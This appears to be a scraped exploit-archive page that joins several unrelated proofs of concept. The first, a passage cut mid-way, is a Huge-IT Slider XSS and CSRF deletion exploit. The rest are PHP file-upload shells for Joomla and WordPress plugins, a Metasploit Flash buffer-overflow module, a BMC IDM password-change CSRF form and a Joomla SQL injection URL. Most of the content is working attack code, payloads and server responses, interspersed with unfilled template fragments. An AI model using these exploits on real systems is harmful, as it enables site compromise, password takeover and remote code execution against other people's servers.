id="huge_it_slideshow_left-ico_1"> <div><i class="huge_it_slideshow_prev_btn_1 fa"></i></div></div> </a> <a id="huge_it_slideshow_right_1" href="#" > <div id="huge_it_slideshow_right-ico_1 , data_1"> <div><i class="huge_it_slideshow_next_btn_1 fa"></i></div></div> </a> </div> <!-- ##########################IMAGES######################### --> ----------------------------------------------------------------------------------- Classes tags [<div>] have a number at the end that is the id of the slider. Also labeled [<div id = "huge_it_dots_ ...>] has the property [image_id] which is the POST variable number of vulnerable parameters. ============================================ POC [DATA RELATING TO THE ABOVE] ============================================ ------------ SLIDER_ID URL REQUEST | ------------ http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&id=2&task=apply -------- POSTDATA -------- name=i0akiN-SEC&order_by_14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&imagess14=& titleimage14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22& sl_url14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_link_target14=& sl_pausetime=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22& sl_changespeed=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22& im_description14=as%3C%2Ftextarea%3E%3Cscript%3Ealert%28%2Fi0akiN_HACK%2F%29%3B%3C%2Fscript%3E& imagess14=%22+onmouseover%3Dalert%28%2Fi0akiN_hack%2F%29+a%3D%22&sl_width=500& sl_height=300&pause_on_hover=off&slider_effects_list=cubeH&sl_position=center&task= -------------------- RESPONSE ADMIN PAGE -------------------- ... <input class="order_by" type="hidden" name="order_by_14" value="0" /> <div class="image-container"> <img src="" onmouseover=alert(/i0akiN_hack/) a="" /> <div> <script> ... </script> <input type="hidden" name="imagess14" id="_unique_name14" value="" onmouseover=alert(/i0akiN_hack/) a="" /> <span class="wp-media-buttons-icon"></span> <div class="huge-it-editnewuploader uploader button14 add-new-image"> <input type="button" class="button14 wp-media-buttons-icon editimageicon" name="_unique_name_button14" id="_unique_name_button14" value="Edit image" /> </div> </div> </div> <div class="image-options"> <div> <label for="titleimage14">Title:</label> <input class="text_area" type="text" id="titleimage14" name="titleimage14" id="titleimage14" value="" onmouseover=alert(/i0akiN_hack/) a=""> </div> <div class="description-block"> <label for="im_description14">Description:</label> <textarea id="im_description14" name="im_description14" >as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script>&lt;/textarea&gt; </div> <div class="link-block"> <label for="sl_url14">URL:</label> <input class="text_area url-input" type="text" id="sl_url14" name="sl_url14" value="" onmouseover=alert(/i0akiN_hack/) a="" > <label class="long" for="sl_link_target14">Open in new tab</label> <input type="hidden" name="sl_link_target14" value="" /> <input class="link_target" type="checkbox" id="sl_link_target14" name="sl_link_target14" /> </div> <div class="remove-image-container"> <a class="button remove-image" href="admin.php?page=sliders_huge_it_slider&id=2&task=apply&removeslide=14">Remove Image</a> </div> </div> <div class="clear"></div> </li> </ul> </div> </div> <div id="postbox-container-1" class="postbox-container"> <div id="side-sortables" class="meta-box-sortables ui-sortable"> <div id="slider-unique-options" class="postbox"> ... <li> <label for="sl_pausetime">Pause time</label> <input type="text" name="sl_pausetime" id="sl_pausetime" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" /> </li> <li> <label for="sl_changespeed">Change speed</label> <input type="text" name="sl_changespeed" id="sl_changespeed" value="" onmouseover=alert(/i0akiN_hack/) a="" class="text_area" /> </li> ... ----------------------------------------- RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER ----------------------------------------- ... <script> var data_2 = []; var event_stack_2 = []; video_is_playing_2 = false; data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt; <script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='"; ===<!-- SUCCESFULL INJECTION :) -->=== var huge_it_trans_in_progress_2 = false; var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a="; var huge_it_playInterval_2; // Stop autoplay. window.clearInterval(huge_it_playInterval_2); .... <!-- ##########################IMAGES######################### --> <div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2"> <div class="huge_it_slide_container_2"> <div class="huge_it_slide_bg_2"> <ul class="huge_it_slider_2"> <li class="huge_it_slideshow_image_item_2" id="image_id_2_0"> <a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2" src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" /> </a> <div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div> <div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script> </div> </li> <input type="hidden" id="huge_it_current_image_key_2" value="0" /> </ul> </div> </div> </div> ... ----------------------------------------- RESPONSE PUBLISHED PAGE WITH IMAGE SLIDER ----------------------------------------- ... <script> var data_2 = []; var event_stack_2 = []; video_is_playing_2 = false; data_2["0"] = []; data_2["0"]["id"] = "0"; data_2["0"]["image_url"] = "" onmouseover = alert(/i0akiN_hack/) a = ""; data_2["0"]["description"] = "as&lt;/textarea&gt; <script>alert(/i0akiN_HACK/);</script>";data_2["0"]["alt"]="' onmouseover=alert(/i0akiN_hack/) a='"; ===<!-- SUCCESFULL INJECTION :) -->=== var huge_it_trans_in_progress_2 = false; var huge_it_transition_duration_2 = " onmouseover=alert(/i0akiN_hack/) a="; var huge_it_playInterval_2; // Stop autoplay. window.clearInterval(huge_it_playInterval_2); .... <!-- ##########################IMAGES######################### --> <div id="huge_it_slideshow_image_container_2" class="huge_it_slideshow_image_container_2"> <div class="huge_it_slide_container_2"> <div class="huge_it_slide_bg_2"> <ul class="huge_it_slider_2"> <li class="huge_it_slideshow_image_item_2" id="image_id_2_0"> <a href="" onmouseover=alert(/i0akiN_hack/) a="" ><img id="huge_it_slideshow_image_2" class="huge_it_slideshow_image_2" src="" onmouseover=alert(/i0akiN_hack/) a="" image_id="14" /> </a> <div class="huge_it_slideshow_title_text_2 "> " onmouseover=alert(/i0akiN_hack/) a="</div> <div class="huge_it_slideshow_description_text_2 ">as&lt;/textarea&gt;<script>alert(/i0akiN_HACK/);</script> </div> </li> <input type="hidden" id="huge_it_current_image_key_2" value="0" /> </ul> </div> </div> </div> ... ==================================== * CSRF & ARBITRARY SLIDER DELETION ==================================== ===================== POC ===================== //delete first 100 sliders <script> function sendData( id_slider ){ var req=new XMLHttpRequest(); req.open("GET","http://localhost/wordpress/wp-admin/admin.php?page=sliders_huge_it_slider&task=remove_cat&id="+id_slider,true); req.withCredentials="true"; req.send(); } for(var i=0;i<100;i++){ sendData( i ); } </script> token authentication not found!
HireHackking

Joomla! Component com_simpleimageupload - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload # Google Dork: inurl:option=com_simpleimageupload # Date: 23.06.2015 # Exploit Author: CrashBandicot @DosPerl # Vendor Homepage: http://tuts4you.de/ # Software Link: http://tuts4you.de/96-development/156-simpleimageupload # Version: 1.0 # Tested on: MsWin32 # Vuln Same to Com_Media Vulnerability # Live Request : POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------247062787817068 -----------------------------247062787817068\r\n Content-Disposition: form-data; name="Filedata"; filename="L0v3.php."\r\n Content-Type: application/x-php\r\n \r\n 0wn3d ! ;)\r\n -----------------------------247062787817068\r\n Content-Disposition: form-data; name="return-url"\r\n \r\n aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n -----------------------------247062787817068--\r\n # Exploit : <?php echo '<form action="#" method="post" enctype="multipart/form-data"> <input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" /> </form>'; if($_POST) { $target = $_POST['target']; $file = "0wn3d ! ;)"; $header = array("Content-Type: application/x-php", "Content-Disposition: form-data; name=\"Filedata\"; file=\"L0v3.php.\""); $ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36"); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",)); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPHEADER, $header); $result = curl_exec($ch); curl_close($ch); print "$result"; } else { die(); } ?> # Path of File : 127.0.0.1/images/[Rand0mString]L0v3.php # Sh00t to Mr_AnarShi-T;
HireHackking

Adobe Flash Player - ShaderJob Buffer Overflow (Metasploit)

HACKER · %s · %s

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled. This module has been tested successfully on: * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169. * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169. * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169. * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Evans', # Vulnerability discovery 'Unknown', # Exploit in the wild 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2015-3090'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'], ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'], ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'], ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => ['win', 'linux'], 'Arch' => [ARCH_X86], 'BrowserRequirements' => { :source => /script|headers/i, :arch => ARCH_X86, :os_name => lambda do |os| os =~ OperatingSystems::Match::LINUX || os =~ OperatingSystems::Match::WINDOWS_7 || os =~ OperatingSystems::Match::WINDOWS_81 end, :ua_name => lambda do |ua| case target.name when 'Windows' return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF when 'Linux' return true if ua == Msf::HttpClients::FF end false end, :flash => lambda do |ver| case target.name when 'Windows' return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169') when 'Linux' return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457') end false end }, 'Targets' => [ [ 'Windows', { 'Platform' => 'win' } ], [ 'Linux', { 'Platform' => 'linux' } ] ], 'Privileged' => false, 'DisclosureDate' => 'May 12 2015', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) b64_payload = Rex::Text.encode_base64(target_payload) os_name = target_info[:os_name] if target.name =~ /Windows/ platform_id = 'win' elsif target.name =~ /Linux/ platform_id = 'linux' end html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end
HireHackking
source: https://www.securityfocus.com/bid/53894/info Picturesurf Gallery plugin is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this issue to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. Picturesurf Gallery 1.2 is vulnerable; other versions may also be affected. PostShell.php <?php $uploadfile="lo.php.gif"; $ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/upload.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile", 'is_simple'=>'is_simple')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.exemple.com/wordpress/wp-content/plugins/picturesurf-gallery/data/upload/lo.php.gif lo.php.gif GIF89a???????????!??????,???????D?;? <?php phpinfo(); ?>
HireHackking

BMC Identity Management - Cross-Site Request Forgery

HACKER · %s · %s

source: https://www.securityfocus.com/bid/53924/info Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests. Exploiting this issue may allow a remote attacker to perform certain actions in the context of an authorized user's session and gain unauthorized access to the affected application; other attacks are also possible. <html><head><title>BMC IDM Change PW CSRF PoC</title></head> <body onload="document.getElementById('CSRF').submit()"> <form action="https://xxx.xxx.xxx.xxx/idm/password-manager/changePasswords.do"; method="post" id="CSRF"> <input type="hidden" name="colChkbx_Tab1" value="CN=Test User,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> <input type="hidden" name="password" value="Abc123!" /> <input type="hidden" name="passwordAgain" value="Abc123!" /> <input type="hidden" name="selAccts" value="CN=user Name,OU=User Accounts,DC=corporate,DC=business,DC=com corporate Win2000" /> </form></body></html>
HireHackking

Joomla! Component com_alphacontent - 'limitstart' SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/53942/info The Alphacontent component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_alphacontent&section=weblinks&Itemid=1&lang=de&limitstart=[sqli]
HireHackking
source: https://www.securityfocus.com/bid/53967/info HD FLV Player plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. HD FLV Player 1.7 is vulnerable; other versions may also be affected. Exploit : PostShell.php <?php $uploadfile="lo.php.jpg"; $ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/contus-hd-flv-player/uploadVideo.php"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, array('myfile'=>"@$uploadfile", 'mode'=>'image')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> Shell Access : http://www.example.com/wordpress/wp-content/uploads/18_lo.php.jpg Filename : [CTRL-u] PostShell.php after executed lo.php.jpg <?php phpinfo(); ?>